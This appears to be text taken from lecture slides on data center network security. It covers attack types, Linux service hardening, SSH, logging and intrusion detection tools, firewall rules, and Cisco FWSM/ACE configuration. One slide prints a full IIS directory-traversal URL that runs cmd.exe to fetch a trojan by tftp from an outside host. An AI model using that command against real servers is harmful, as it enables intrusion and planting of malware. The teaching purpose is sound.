Data Center Network Security

History
Old days security = planting two firewalls Today security = very complex problem

Type of attacks
Atacks on networks became more sophisticated and are carried through, but not limited to, one of the following techniques:
Packet sniffing An application that uses the promiscuous mode of the network adapter to capture all networks packets. IP spoofing An attack in which a hacker assumes an IP address of others to conceal its true identity Denial-of-service (DoS) attack Aims to overwhelm a service so as to deny legitimate requests from being serviced. The service may be in the form of bandwidth, memory, or CPU. It is the most well-known of all Internet attacks, and efforts should be invested in understanding its mechanisms. Some of the more famous DoS attacks include the following:
Code Red Blaster Ping of Death Trinity

Type of attacks
Password attack As its name implies, this attack intends to acquire passwords to important assets so as to cause further damage. Password attacks can be achieved through other methods previously mentioned, such as IP spoofing, or they can be achieved via brute force Man-in-the-middle attack This type of attack happens when a hacker manages to position himself between the source and the destination of a network transaction. ARP cache poisoning is one common method Application attack This type of attack happens when application software holes are exploited to gain access to a computer system. The holes may be bugs or may be TCP port numbers that are exposed Port redirection attack This type of attack makes use of a compromised host to gain access to a network that is otherwise protected

Typical Intrusion Sequence Hacking the Web/Application Server

After a phase of probing/scanning, the hacker detects the vulnerability of the web/application server The hacker exploits the vulnerability to get a shell For example:
Copy the Trojan on the web/application server:
HTTPS://www.example.com/scripts/..%c0%af../winnt/system32 /cmd.exe?/c+tftp%20i%2010.20.15.15%20GET%20trojan.exe%20trojan.exe

Automated Intrusion Sequence Blaster Ex.

Attack Patterns

Server Farm Security Strategies

Segmenting the Server Farm

Building the Firewall Ruleset

From Physical Separation to Logical Separation

Avoid Break-ins in Linux

To save on system resources and make system administration less complex, many services are handled through a configuration file /etc/inetd.conf. This file tells the system how to run each of the available services. Many Linux vendors turn on various services in inetd.conf by default when for maximum security they should be off! In many corporate environments security as such is not an issue. If there is enough security to prevent accidental damage in these 'soft' environments providing access to these services is more important than preventing them.

Avoid Break-ins in Linux

If your Linux host is exposed to the Internet you may hold a different point of view though. To check what services are currently running on your Linux system, type the command netstat -vat This will print up something like this
tcp 0 0 *:6000 *:* LISTEN tcp 0 0 *:www *:* LISTEN tcp 0 0 *:auth *:* LISTEN tcp 0 0 *:finger *:* LISTEN tcp 0 0 *:shell *:* LISTEN tcp 0 0 *:sunrpc *:* LISTEN

Each line that says LISTEN is a service waiting for connections.

Avoid Break-ins in Linux

Some of these services run as stand-alone programs, but many of them are controlled by /etc/inetd.conf. If you are not sure what a service does, look it up in /etc/inetd.conf. For instance, if you type

grep '^finger' /etc/inetd.conf

you will get back a line from inetd.conf like this

finger stream tcp nowait nobody /usr/sbin/tcpd /usr/sbin/in.fingerd

Avoid Break-ins in Linux

To see what the program does, look up in.fingerd in the man page. If you think you can live without this service, then it can be turned off in /etc/inetd.conf. By commenting out the line (put a # at the start of the line) and then issuing the command kill all -HUP inetd you can immediately and permanently turn a service off. There is no need to reboot.

Avoid Break-ins in Linux

If a service is not listed in /etc/inetd.conf then it probably runs as a stand-alone program. You can remove a service provided by a stand-alone background program by uninstalling its package. Only do this if you are sure about what the program does and are certain that it is not necessary.

SSH
To add extra security to the various services, Linux has a system for allowing and denying them to chosen hosts. For instance, you may wish to allow logins from machines at your own site, but not from the Internet. The files /etc/hosts.allow and /etc/hosts.deny list allowed services and hosts.

SSH
The method of denying connections by checking the host provides a good basic method for throwing off attacks. It is not the end of the story. It is possible to fake host names on incoming connections ( oh yes it is ). While data is in transit between programs over the Internet it is also in danger. Anyone with the knowledge can look at your data. Using a method known as 'spoofing' they can even inject fake data into a legitimate stream. These problems come about because of the way that Internet protocols interact. To overcome these difficulties ssh was devised.

SSH
Ssh is a stable, well-developed system with open source that provides encryption and authentication on connections. Encryption is using codes to protect the packets of data while in transit. Authentication is a process for verifying if a.packet of data or a connection is valid. There are ssh clients for most other operating systems too. By using Linux as a server you can provide ssh level security for all your network use.

Logging
Linux has a comprehensive set of subsystems to let the systems administrator know what is going on with his or her system. All manner of log files are generally kept in the /var/log directory. Most of the standard services log information to /var/log/syslog and /var/log/messages about users connecting to them or attempting to connect. There are also log files for such services as apache (/var/log/httpd/access_log), mail (/var/log/mail) and firewall (/var/log/firewall).

Logging
The main problem with logging events is that one tends to end up with too much data. Careful filtering and only logging important information is important.

Logging
There are some good tools out there that will make this work easier. Ethereal is a packet sniffer
With it you can capture various types of packets over a given period of time. It also shows all manner of information about the packets. It's useful for watching packets coming into and going out of your machine. Generally it will detect traffic on your network segment.

Logging
Another logging/intrusion detection type tool is called Tripwire.
It takes a snapshot of your important system files and records their signature in a database. Various signature levels are available from mild to wild. You can also set the rules in a policy file to tell Tripwire what to check. After the database is initialized and signed Tripwire can be executed whenever you need to check the integrity of your system. The report will point out when your files are changed and the severity of the security risk. The Tripwire report is pretty easy to read and can be customized according to your file tracking needs.

Logging
A popular program for detecting access attempts (via the network) and port scans is Snort. The program produces files that log these types of activities and even gives some idea of where to find out more information. The same problem as with other log files. It gets tough for a busy system administrator to review all the log files on a regular basis

Firewalls
A firewall is a device that protects a private network from the wider Internet.
The simplest form of firewall is a Linux machine with one network connection ( an Ethernet card or modem ) connected to the Internet and the other connected to the private network. The Firewall computer can reach the protected network and the Internet. This traffic between the protected network and the Internet is controlled, in both directions by a list of rules. These rules can be customized for your needs.
CoyoteLinux.com has a firewall system that fits on a floppy and doesn't need a hard disk to run. It's design specifically to address the need for an easy to install no-nonsense Linux firewall

Firewalls
All data flowing to and from the Internet and the private network is filtered by the firewall. Inside the private network less care needs to be taken with turning off services and the like. It is a way of concentrating effort on making one machine secure and protecting many others in the process. The methods for correctly setting up firewalls are quite complex.
First you have to configure your machine for two Ethernet cards. Then you have to use the IP-chains/IP-tables software to set up filters which connect the two Ethernet cards data links.

Firewalls
The main drawback with making your systems more secure is that they become less accessible. The idea behind ramping up your system's security is to stop use of your computers, by crooks, thieves and malcontents but let the legitimate users use the system

Tools
Tools for defense can be grouped into four categories:
log monitoring connection monitoring host based intrusion detection network based intrusion detection

Log Monitoring
These tools will watch over your log files and help you detect security related events (actually, based on the rules, you can have them detect any type of event). Either by default, or through configuration, they can e-mail you the alerts.
autobuse logcheck Logwatch swatch

Connection Monitoring
When connected to the internet, unless a firewall is in place, other systems can connect to yours. These tools will help you know who is connecting to your box, even to the point of detecting stealth scans that normal logging will not catch.
ippl jail klaxon portsentry tcplogd

Host based intrusion detection

These days, it's often difficult to know if an intrusion has taken place. Upon successfully gaining root privilege, an intruder will often erase the logs of the break-in. Quite often, they will take an additional step of installing a set of trojan binaries known as a rootkit. These tools help to detect the intrusion, sometimes even after the intruder has gained root access.
hostsentry Tripwire ViperDB

Network based intrusion detection

These tools will help detect intrusions (or intrusion attempts) across your entire network, not just on individual hosts. They will look at the traffic and attempt to match known attack patterns and notify you if an attack is seen.
Network Flight Recorder SHADOW snort

Linux Firewalls
Linux Firewalls * Define a Network Security Policy * Use a Secure Linux Distro for your firewall * Harden your firewall o Install the minimum number of packages o Turn all unused services off o Disallow user logins * Define a set of Firewall Rules * Define egress and ingress filters * You'd probably need to IPMasquerade or NAT o Allows internal machine to get out on the net o Outside world see these internal machines as www.foo.com * Start with existing/proven/simple Example Firewall configurations * Test your Firewall from the inside and outside o Apply all known Exploits and vulnerabilities o Apply all known Hacking Tools and attacks o Apply all known Rootkits

Installing a Firewall does NOT solve the "security" problem

Linux Firewall Rules

Firewall Rules SecurityFocus.net Example Firewall Scripts Linux-Sec.net/FW/Scripts Example Firewall Scripts

General Firewall Rules * Turn on ingress and egress Rules

* Turn on/off various /proc options

* Outgoing Rules Allow all internal PCs to freely access the Internet * Incoming Rules Allow incoming DNS requests to the DNS server Allow incoming SMTP requests to the mail server Allow incoming HTTP requests to the web server Allow incoming FTP requests to the ftp server Allow incoming ssh requests to the ssh server Allow incoming wireless requests to the wireless gw server Allow incoming ppp requests to the ppp gw server Allow incoming secure pop3/imap requests to the secure pop server Allow incoming authenticated vpn requests to the vpn server Disallow messenger.msn.com Disallow oscar.aol.com Disallow messenger.yahoo.com (IIRC)

Linux Firewall Rules

NAT Rules IP Masquerade E-InfoMax.com IPMasquerade IPMasq.cjb.net IP_Masuerade-HOWTO LinuxDoc.org IP_Masquerade-HOWTO CSUChico.edu

3-line IP Masquerade LinuxDoc.org ipchains -P forward DENY ipchains -A forward -i ppp0 -j MASQ echo 1 > /proc/sys/net/ipv4/ip_forward Egress and Ingress Filtering * Ingress Filtering: incoming network traffic entering your LAN IETF.org RFC2827.txt Sans.org Packet_filter - ingress/egress Sans.org Firewall Issues

* Egress Filtering: outoging network traffic leaving your LAN Sans.org Top Ten Blocking Recommendations Using IPChains Sans.org ipchains Egress Rules Sans.org Egress Filtering - cisco Sans.org Egress Filtering ( same as above ) Incidents.org Egress - cicso

Linux Firewall Rules

Cisco ACLs Firewalls/HowTo/#Cisco Cisco ACLs Proxy Server Rules HiSecure Proxy(?) tcpr ftp and telnet forwarder COAST udprelay Dec.com XForward

ReDir port redirector Reverse Pimpage Revision remotely access machines behind a firewall Reverse Utilities telnet/http/ssh access to machines behind a firewall * Sock5 SourceForge.net Tsocks SourceForge.net socksd inet.no inet.no dante Umich.edu nylon SolSoft NSM proxy-based firewall httpf filters out java, js, etc tproxy Squid-Cache.org * TIS Proxy Server

Data Center Firewalls

FWSM
Protocol support Syslog Management tools DoS protection

ACE
ACE = Application control engine
provides application and network operations management with new levels of control over the way they deploy, operate, deliver, secure and manage their applications and business services across the extended enterprise. It helps enable greater control over the application infrastructure, allowing organizations to quickly deploy and migrate applications, delivering the highest levels of services to the end user while simplifying the overall management and operation of a data center.

FWSM
FWSM = Firewall Service Module

MARS
MARS = Monitoring, Analysis and Response System

Data Center Firewalls

ACE
Integrated SLB and SSL High capacity Failover group per context Failover tracking by HSRP, interface, IP address Autostate aware Role based access control Configuration rollback marking Bridge-mode: interface pairs per context Advanced http inspection: mime/regex

ACEFWSM Security Comparison

Access Lists Inspection Engines Timeouts Private VLANs Role Based Access Control Failover Resource Allocation Configuration Rollback VLAN Assignments

Stateful ACLsBridge Mode Context

ACE Note: ACE Loggin Phase 2 access-list BPDU ethertype permit bpdu access-list blue extended permit ip any any interface vlan 104 bridge-group 1 access-group input BPDU access-group input blue no shutdown interface vlan 204 bridge-group 1 access-group input BPDU access-group input blue no shutdown interface bvi 1 ip address 12.20.40.6 255.255.255.0 alias 12.20.40.8 255.255.255.0 peer ip address 12.20.40.7 255.255.255.0 no shutdown ip route 0.0.0.0 0.0.0.0 12.20.40.1 FWSM 3.1 firewall transparent access-list BPDU ethertype permit bpdu access-list blue extended permit ip any any interface Vlan104 nameif outside bridge-group 1 security-level 0 interface Vlan40 nameif inside bridge-group 1 security-level 100 interface BVI1 ip address 12.20.40.4 255.255.255.0 standby 12.20.40.5 access-group BPDU in interface outside access-group blue in interface outside access-group BPDU in interface inside access-group blue in interface inside route outside 0.0.0.0 0.0.0.0 12.20.40.1 1

Inspection Compared

HTTP Inspection
RFC 2616 compliance and filtering Protocol Conformance: The 1st line of a request is "Method SP" and that of response is HTTP-Version SP, etc. De-obfuscation: Override attempts to avoid regex searches by encoding the URL Methods: OPTIONS, GET, POST, HEAD, PUT, DELETE, TRACE, CONNECT Extensions: INDEX, MOVE, MKDIR, COPY, EDIT, UNEDIT, SAVE, LOCK, NLOCK, REVLABEL, REVLOG, REVNUM, SETATTRIBUTE, GETATTRIBUTE, GETATTRIBUTENAMES, GETPROPERTIES, STARTREV, STOPREV Length and encoding checks Length: Configurable range for URL and URL Header requests and responses Encoding: chunked | compress | deflate | gzip | identity Detect HTTP misuse Peer-to-peer (p2p) applications: Kazaa, Gnutella Tunneling applications: HTTPort/HTTHost, FireThru Instant Messaging: (IMIYAHOO Messenger) MIME type validation and filtering (ACE only) Audio: /*, /midi, /basic, /mpeg, /x-adpcm, /x-aiff, /x-ogg, x-wav (8) Image: /*, /cgf, /gif, /jpeg, /png, /tiff, /x-3ds, /x-bitmap, /x-niff, /x-portable, /x-xpm (11) Text: /*, /css, /html, /plain, /richtext, /sgml, /xmcd, /xml (8 Video: /*, /-flc, /mpeg, /quicktime, /sgi, /x-avi, /x-fli, /x-mng, /x-msvideo (9) Application: /msword, /octet-stream, /pdf, /postscript, /vnd.ms-excel, /vnd.mspowerpoint, /x-gzip, /x-java-archive, /x-java-vm, /zip (10) Regex filtering on HTTP messages (ACE only) Detect protocol running on top of HTTP, i.e., to detect Yahoo Messenger, look for YMSG in the first 4 bytes

HTTP Inspection Ex.Allow Only GETs

Timeouts per Flow

FWSM 3.1 class-map TN3270-class match port tcp eq 23 policy-map TN3270-policy class TN3270-class set connection timeout embryonic 0:00:30 half-closed 0:10:00 tcp 24:00:00 service-policy TN3270-policy interface inside ACE parameter-map type connection TN3270 set timeout inactivity 86400 class-map match-all TN3270-class 2 match port tcp eq telnet policy-map multi-match TN370-policy class TN3270-class connection advanced-options TN3270 interface vlan 307 service-policy input TN370-policy

Private VLANs with Service Modules

Role-Based Access with ACE

Customizing Roles and Domains with ACE